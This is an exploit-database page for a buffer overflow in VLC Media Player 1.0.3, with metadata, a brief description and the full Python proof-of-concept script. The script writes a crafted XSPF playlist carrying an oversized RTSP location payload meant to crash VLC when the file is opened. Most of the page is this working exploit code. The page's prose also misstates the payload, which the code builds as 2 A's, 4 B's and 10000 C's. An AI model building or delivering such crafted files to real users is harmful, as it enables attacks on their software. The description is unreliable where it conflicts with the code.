VLC Media Player - exploit.company

vendor:

VLC Media Player

by:

Dr_IDE

7.5

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: VLC Media Player

Affected Version From: 1.0.3

Affected Version To: 1.0.3

Patch Exists: YES

Related CWE: N/A

CPE: a:videolan:vlc_media_player

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: OSX 10.6.2, Ubuntu 9 [2.6.28-15-generic], No Go on Windows

2010

VLC Media Player <= 1.0.3 RTSP Buffer Overflow PoC (OSX/Linux)

VLC Media Player versions 1.0.3 and below are vulnerable to a buffer overflow vulnerability when parsing a specially crafted XSPF file. This PoC creates a malicious XSPF file containing a payload of 10000 A's followed by 4 B's and 2 A's. When the file is opened in VLC, the buffer overflow occurs, resulting in a crash.

Mitigation:

Upgrade to the latest version of VLC Media Player

Source

Exploit-DB raw data:

#!/usr/bin/env python

###########################################################################
#
# VLC Media Player <= 1.0.3 RTSP Buffer Overflow PoC (OSX/Linux)
# Found By:     Dr_IDE
# Tested On:    OSX 10.6.2                      (v1.0.3)
# Tested On:    Ubuntu 9 [2.6.28-15-generic]    (v0.9.9a)
# Tested On:    No Go on Windows
#
###########################################################################

header1  = ("<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n")
header1 += ("<playlist version=\"1\" xmlns=\"http://xspf.org/ns/0/\" xmlns:vlc=\"http://www.videolan.org/vlc/playlist/ns/0/\">\n")
header1 += ("\t<title>Playlist</title>\n")
header1 += ("\t<trackList>\n")
header1 += ("\t\t<track>\n")
header1 += ("\t\t\t<location>rtsp://localhost@localhost/foo/#{")

payload  = ("\x41" * 2 + "\x42" * 4 + "\x43" * 10000)

header2  = ("}</location>\n");
header2 += ("\t\t\t<extension application=\"http://www.videolan.org/vlc/playlist/0\">\n");
header2 += ("\t\t\t\t<vlc:id>0</vlc:id>\n");
header2 += ("\t\t\t</extension>\n");
header2 += ("\t\t</track>\n");
header2 += ("\t</trackList>\n");
header2 += ("</playlist>\n");

try:
    f1 = open("vlc_1.0.X.xspf","w")
    f1.write(header1 + payload + header2)
    f1.close()
    print("\nExploit file created!\n")
except:
    print "Error"

#[pocoftheday.blogspot.com]